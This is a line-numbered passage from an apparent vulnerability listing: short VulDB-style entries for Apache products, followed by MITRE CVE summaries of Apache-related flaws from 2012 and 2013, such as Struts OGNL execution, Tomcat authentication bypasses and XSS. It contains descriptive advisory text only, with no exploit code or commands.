13049| [3310] Apache OpenOffice 1.1.3/2.0.4/2.2.1 TIFF Image Parser Heap-based memory corruption
13050| [38768] Apache HTTP Server up to 2.1.7 mod_autoindex.c cross site scripting
13051| [38952] Apache Geronimo 2.0.1/2.1 unknown vulnerability
13052| [38658] Apache Tomcat 4.1.31 cal2.jsp cross site request forgery
13053| [38524] Apache Geronimo 2.0 unknown vulnerability
13054| [3256] Apache Tomcat up to 6.0.13 cross site scripting
13055| [38331] Apache Tomcat 4.1.24 information disclosure
13056| [38330] Apache Tomcat 4.1.24 information disclosure
13057| [38185] Apache Tomcat 3.3/3.3.1/3.3.1a/3.3.2 Error Message CookieExample cross site scripting
13058| [37967] Apache Tomcat up to 4.1.36 Error Message sendmail.jsp cross site scripting
13059| [37647] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 Authorization unknown vulnerability
13060| [37646] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 unknown vulnerability
13061| [3141] Apache Tomcat up to 4.1.31 Accept-Language Header cross site scripting
13062| [3133] Apache Tomcat up to 6.0 HTTP cross site scripting
13063| [37292] Apache Tomcat up to 5.5.1 cross site scripting
13064| [3130] Apache OpenOffice 2.2.1 RTF Document Heap-based memory corruption
13065| [36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal
13066| [36892] Apache Tomcat up to 4.0.0 hello.jsp cross site scripting
13067| [37320] Apache MyFaces Tomahawk up to 1.1.4 cross site scripting
13068| [36697] Apache Tomcat up to 5.5.17 implicit-objects.jsp cross site scripting
13069| [36491] Apache Axis 1.0 Installation javaioFileNotFoundException information disclosure
13070| [36400] Apache Tomcat 5.5.15 mod_jk cross site scripting
13071| [36698] Apache Tomcat up to 4.0.0 cal2.jsp cross site scripting
13072| [36224] XAMPP Apache Distribution up to 1.6.0a adodb.php connect memory corruption
13073| [36225] XAMPP Apache Distribution 1.6.0a sql injection
13074| [2997] Apache httpd/Tomcat 5.5/6.0 directory traversal
13075| [35896] Apache Apache Test up to 1.29 mod_perl denial of service
13076| [35653] Avaya S8300 Cm 3.1.2 Apache Tomcat unknown vulnerability
13077| [35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption
13078| [35067] Apache Stats up to 0.0.2 extract unknown vulnerability
13079| [35025] Apache Stats up to 0.0.3 extract unknown vulnerability
13080| [34252] Apache HTTP Server denial of service
13081| [2795] Apache OpenOffice 2.0.4 WMF/EMF File Heap-based memory corruption
13082| [33877] Apache Opentaps 0.9.3 cross site scripting
13083| [33876] Apache Open For Business Project unknown vulnerability
13084| [33875] Apache Open For Business Project cross site scripting
13085| [2703] Apache Jakarta Tomcat up to 5.x der_get_oid() memory corruption
13086| [2611] Apache HTTP Server up to 1.0.1 set_var Format String
13087| [31827] XMB Extreme Message Board up to 1.9.6 Apache HTTP Server memcp.php directory traversal
13088| [2452] Apache HTTP Server up to 2.2.3 on Windows mod_alias unknown vulnerability
13089| [31663] vbPortal Apache HTTP Server index.php directory traversal
13090| [2414] Apache HTTP Server up to 2.2.3 mod_rewrite memory corruption
13091| [2393] Apache HTTP Server up to 2.2.2 HTTP Header cross site scripting
13092| [30623] Apache James 2.2.0 SMTP Server denial of service
13093| [30176] PHP-Fusion up to 6.00.306 Apache HTTP Server .php.gif privilege escalation
13094|
13095| MITRE CVE - https://cve.mitre.org:
13096| [CVE-2013-4156] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.
13097| [CVE-2013-4131] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
13098| [CVE-2013-3239] phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir directory is configured, allows remote authenticated users to execute arbitrary code by using a double extension in the filename of an export file, leading to interpretation of this file as an executable file by the Apache HTTP Server, as demonstrated by a .php.sql filename.
13099| [CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.
13100| [CVE-2013-2765] The ModSecurity module before 2.7.4 for the Apache HTTP Server allows remote attackers to cause a denial of service (NULL pointer dereference, process crash, and disk consumption) via a POST request with a large body and a crafted Content-Type header.
13101| [CVE-2013-2251] Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
13102| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
13103| [CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
13104| [CVE-2013-2189] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.
13105| [CVE-2013-2135] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.
13106| [CVE-2013-2134] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
13107| [CVE-2013-2115] Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.
13108| [CVE-2013-2071] java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.
13109| [CVE-2013-2067] java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.
13110| [CVE-2013-1966] Apache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.
13111| [CVE-2013-1965] Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
13112| [CVE-2013-1896] mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.
13113| [CVE-2013-1884] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.
13114| [CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."
13115| [CVE-2013-1862] mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.
13116| [CVE-2013-1849] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.
13117| [CVE-2013-1847] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.
13118| [CVE-2013-1846] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.
13119| [CVE-2013-1845] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.
13120| [CVE-2013-1814] The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.
13121| [CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not property implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
13122| [CVE-2013-1768] The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.
13123| [CVE-2013-1088] Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 before SP6 Patch 1 allows remote attackers to hijack the authentication of arbitrary users by leveraging improper request validation by iManager code deployed within an Apache Tomcat container.
13124| [CVE-2013-1048] The Debian apache2ctl script in the apache2 package squeeze before 2.2.16-6+squeeze11, wheezy before 2.2.22-13, and sid before 2.2.22-13 for the Apache HTTP Server on Debian GNU/Linux does not properly create the /var/lock/apache2 lock directory, which allows local users to gain privileges via an unspecified symlink attack.
13125| [CVE-2013-0966] The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac OS X before 10.8.3 does not properly handle ignorable Unicode characters, which allows remote attackers to bypass intended directory authentication requirements via a crafted pathname in a URI.
13126| [CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13127| [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data.
13128| [CVE-2013-0253] The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
13129| [CVE-2013-0248] The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.
13130| [CVE-2013-0239] Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.
13131| [CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results.
13132| [CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.
13133| [CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.
13134| [CVE-2012-5887] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.
13135| [CVE-2012-5886] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.
13136| [CVE-2012-5885] The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.
13137| [CVE-2012-5786] The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF, possibly 2.6.0, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13138| [CVE-2012-5785] Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13139| [CVE-2012-5784] Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13140| [CVE-2012-5783] Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13141| [CVE-2012-5633] The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.
13142| [CVE-2012-5616] Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.
13143| [CVE-2012-5568] Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
13144| [CVE-2012-5351] Apache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a "Signature exclusion attack," a different vulnerability than CVE-2012-4418.
13145| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
13146| [CVE-2012-4557] The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.
13147| [CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query.
13148| [CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors.
13149| [CVE-2012-4534] org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.
13150| [CVE-2012-4528] The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.
13151| [CVE-2012-4501] Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows remote attackers to make arbitrary API calls by leveraging the system user account, as demonstrated by API calls to delete VMs.
13152| [CVE-2012-4460] The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.
13153| [CVE-2012-4459] Integer overflow in the qpid::framing::Buffer::checkAvailable function in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (crash) via a crafted message, which triggers an out-of-bounds read.
13154| [CVE-2012-4458] The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (memory consumption and server crash) via a large number of zero width elements in the client-properties map in a connection.start-ok message.
13155| [CVE-2012-4446] The default configuration for Apache Qpid 0.20 and earlier, when the federation_tag attribute is enabled, accepts AMQP connections without checking the source user ID, which allows remote attackers to bypass authentication and have other unspecified impact via an AMQP request.
13156| [CVE-2012-4431] org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.
13157| [CVE-2012-4418] Apache Axis2 allows remote attackers to forge messages and bypass authentication via an "XML Signature wrapping attack."
13158| [CVE-2012-4387] Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.
13159| [CVE-2012-4386] The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.
13160| [CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13161| [CVE-2012-4063] The Apache Santuario configuration in Eucalyptus before 3.1.1 does not properly restrict applying XML Signature transforms to documents, which allows remote attackers to cause a denial of service via unspecified vectors.
13162| [CVE-2012-4001] The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server does not properly verify its host name, which allows remote attackers to trigger HTTP requests to arbitrary hosts via unspecified vectors, as demonstrated by requests to intranet servers.
13163| [CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684.
13164| [CVE-2012-3546] org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.
13165| [CVE-2012-3544] Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.
13166| [CVE-2012-3526] The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.
13167| [CVE-2012-3513] munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.
13168| [CVE-2012-3506] Unspecified vulnerability in the Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.03 has unknown impact and attack vectors.
13169| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
13170| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
13171| [CVE-2012-3467] Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism to authenticate catch-up shadow connections to AMQP brokers, which allows remote attackers to bypass authentication.
13172| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
13173| [CVE-2012-3446] Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.
13174| [CVE-2012-3376] DataNodes in Apache Hadoop 2.0.0 alpha does not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.
13175| [CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.
13176| [CVE-2012-3126] Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.
13177| [CVE-2012-3123] Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect confidentiality, related to Apache HTTP Server.
13178| [CVE-2012-2760] mod_auth_openid before 0.7 for Apache uses world-readable permissions for /tmp/mod_auth_openid.db, which allows local users to obtain session ids.
13179| [CVE-2012-2733] java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.
13180| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
13181| [CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.
13182| [CVE-2012-2380] Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.
13183| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
13184| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
13185| [CVE-2012-2329] Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.
13186| [CVE-2012-2145] Apache Qpid 0.17 and earlier does not properly restrict incoming client connections, which allows remote attackers to cause a denial of service (file descriptor consumption) via a large number of incomplete connections.
13187| [CVE-2012-2138] The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.
13188| [CVE-2012-2098] Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.
13189| [CVE-2012-1574] The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.
13190| [CVE-2012-1181] fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.
13191| [CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.
13192| [CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.
13193| [CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.
13194| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
13195| [CVE-2012-0840] tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
13196| [CVE-2012-0838] Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.
13197| [CVE-2012-0788] The PDORow implementation in PHP before 5.3.9 does not properly interact with the session feature, which allows remote attackers to cause a denial of service (application crash) via a crafted application that uses a PDO driver for a fetch and then calls the session_start function, as demonstrated by a crash of the Apache HTTP Server.
13198| [CVE-2012-0394] ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
13199| [CVE-2012-0393] The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.
13200| [CVE-2012-0392] The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
13201| [CVE-2012-0391] The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.
13202| [CVE-2012-0256] Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.
13203| [CVE-2012-0216] The default configuration of the apache2 package in Debian GNU/Linux squeeze before 2.2.16-6+squeeze7, wheezy before 2.2.22-4, and sid before 2.2.22-4, when mod_php or mod_rivet is used, provides example scripts under the doc/ URI, which might allow local users to conduct cross-site scripting (XSS) attacks, gain privileges, or obtain sensitive information via vectors involving localhost HTTP requests to the Apache HTTP Server.
13204| [CVE-2012-0213] The UnhandledDataStructure function in hwpf/model/UnhandledDataStructure.java in Apache POI 3.8 and earlier allows remote attackers to cause a denial of service (OutOfMemoryError exception and possibly JVM destabilization) via a crafted length value in a Channel Definition Format (CDF) or Compound File Binary Format (CFBF) document.
13205| [CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
13206| [CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.
13207| [CVE-2012-0031] scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
